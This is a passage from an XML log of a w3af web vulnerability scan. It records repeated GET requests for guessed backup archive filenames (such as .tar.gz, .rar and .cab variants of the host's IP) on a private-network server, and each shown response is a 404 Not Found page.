                    <status>GET http://10.12.68.25:31337/10.12.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="215">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="217">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="217">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="218">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="218">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="219">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="219">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="220">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="220">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="221">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="221">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="222">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="222">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="223">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="223">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="224">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="224">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="225">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="225">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="226">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="226">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="227">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="227">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="228">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="228">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="230">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="230">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="231">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="231">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="232">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="232">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="233">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="233">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="234">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="234">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="235">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="235">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="236">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="236">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="237">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="237">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
